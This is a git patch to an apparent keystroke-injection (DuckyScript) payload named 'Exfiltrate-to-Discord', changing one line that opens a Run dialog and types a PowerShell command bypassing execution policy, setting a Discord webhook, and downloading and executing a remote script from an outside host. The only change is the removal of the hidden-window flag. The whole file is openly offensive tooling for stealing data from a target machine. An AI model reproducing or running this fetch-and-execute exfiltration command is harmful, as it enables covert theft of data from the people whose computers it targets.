From e5324b6497125eef28995384b5812dd04c8e6117 Mon Sep 17 00:00:00 2001 From: egieb <93350544+beigeworm@users.noreply.github.com> Date: Fri, 20 Jun 2025 10:53:53 +0000 Subject: [PATCH] Update Exfiltrate-to-Discord.txt --- Exfiltrate-to-Discord/Exfiltrate-to-Discord.txt | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Exfiltrate-to-Discord/Exfiltrate-to-Discord.txt b/Exfiltrate-to-Discord/Exfiltrate-to-Discord.txt index 74ed025..3ed72f7 100644 --- a/Exfiltrate-to-Discord/Exfiltrate-to-Discord.txt +++ b/Exfiltrate-to-Discord/Exfiltrate-to-Discord.txt @@ -15,6 +15,6 @@ REM open powershell (remove -W Hidden to show the window) DELAY 1000 GUI r DELAY 750 -STRING powershell -Ep Bypass -W H -C $dc='WEBHOOK_HERE'; iex (irm bw0.cc/exfl) +STRING powershell -Ep Bypass -C $dc='WEBHOOK_HERE'; iex (irm bw0.cc/exfl) ENTER